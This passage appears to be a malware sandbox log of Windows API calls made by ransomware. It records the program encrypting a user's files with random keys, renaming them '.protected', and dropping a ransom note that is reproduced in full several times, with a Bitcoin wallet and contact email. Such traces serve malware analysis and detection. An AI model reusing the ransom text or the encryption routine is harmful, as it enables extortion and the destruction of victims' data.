HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk.protected")) returned 1 [0090.070] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.070] lstrcmpiW (lpString1="Windows Media 
Player.lnk", lpString2="Windows") returned 1 [0090.070] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Program Files") returned 1 [0090.070] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Program Files (x86)") returned 1 [0090.070] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="$Recycle.bin") returned 1 [0090.070] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="System Volume Information") returned 1 [0090.070] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 135 [0090.070] StrStrIW (lpFirst="Windows Media Player.lnk", lpSrch=".protected") returned 0x0 [0090.070] lstrcmpW (lpString1="Windows Media Player.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0090.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 135 [0090.071] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".txt") returned 
0x0 [0090.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 135 [0090.071] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".rar") returned 0x0 [0090.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 135 [0090.071] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".zip") returned 0x0 [0090.071] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0090.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff9f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.077] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x60b, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0090.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.077] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.077] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.077] CloseHandle (hObject=0x158) returned 1 [0090.077] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.protected") returned 145 [0090.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.protected")) returned 1 [0090.078] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.078] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.078] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\RESTORE_FILES.txt") returned 128 [0090.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.079] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.079] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.080] lstrlenA (lpString="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") returned 684 [0090.080] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 
[0090.080] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.080] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.080] CloseHandle (hObject=0x154) returned 1 [0090.080] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.080] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.080] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RESTORE_FILES.txt") returned 120 [0090.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.081] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.081] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.082] lstrlenA (lpString="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") returned 684 [0090.082] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.082] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.082] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.082] CloseHandle (hObject=0x150) returned 1 [0090.082] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.082] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Windows") returned -1 [0090.082] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Program Files") returned 1 [0090.082] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Program Files (x86)") returned 1 [0090.082] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="$Recycle.bin") returned 1 [0090.082] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="System Volume Information") returned 1 [0090.082] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 110 [0090.082] StrStrIW (lpFirst="Window Switcher.lnk", lpSrch=".protected") returned 0x0 [0090.082] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0090.082] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.082] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window 
Switcher.lnk") returned 110 [0090.083] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".txt") returned 0x0 [0090.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 110 [0090.083] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".rar") returned 0x0 [0090.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 110 [0090.083] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".zip") returned 0x0 [0090.083] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x110, lpOverlapped=0x0) returned 1 [0090.084] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.084] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x110, lpOverlapped=0x0) returned 1 [0090.084] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.084] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.084] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.084] CloseHandle (hObject=0x150) returned 1 [0090.084] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.protected") returned 120 [0090.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.protected")) returned 1 [0090.085] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.085] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.085] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RESTORE_FILES.txt") returned 108 [0090.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.086] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.086] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.086] lstrlenA (lpString="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") returned 684 [0090.086] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0090.086] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.087] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.087] CloseHandle (hObject=0x14c) returned 1 [0090.088] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.088] lstrcmpiW (lpString1="UserData", lpString2="Windows") returned -1 [0090.088] lstrcmpiW (lpString1="UserData", lpString2="Program Files") returned 1 [0090.088] lstrcmpiW (lpString1="UserData", lpString2="Program Files (x86)") returned 1 [0090.088] lstrcmpiW (lpString1="UserData", lpString2="$Recycle.bin") returned 1 [0090.088] lstrcmpiW (lpString1="UserData", lpString2="System Volume Information") returned 1 [0090.088] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned 86 [0090.088] lstrcmpW (lpString1="UserData", lpString2=".") returned 1 [0090.088] lstrcmpW (lpString1="UserData", lpString2="..") returned 1 [0090.088] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned 88 [0090.088] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.088] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.088] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.088] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.088] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.088] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.088] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\.") returned 88 [0090.089] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.089] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.089] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.089] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.089] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.089] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.089] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.089] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\..") returned 89 [0090.089] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.089] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.089] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.089] lstrcmpiW (lpString1="Low", lpString2="Windows") returned -1 [0090.089] lstrcmpiW (lpString1="Low", lpString2="Program Files") returned -1 [0090.089] lstrcmpiW (lpString1="Low", lpString2="Program Files (x86)") returned -1 [0090.089] lstrcmpiW (lpString1="Low", lpString2="$Recycle.bin") returned 1 [0090.089] lstrcmpiW (lpString1="Low", lpString2="System Volume Information") returned -1 [0090.089] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned 90 [0090.089] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0090.089] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0090.090] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned 92 [0090.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.090] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.090] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.090] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.090] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.090] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.090] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.") returned 92 [0090.090] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.090] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.090] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.090] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.090] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.090] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.090] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.090] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.090] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.090] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.090] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.090] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 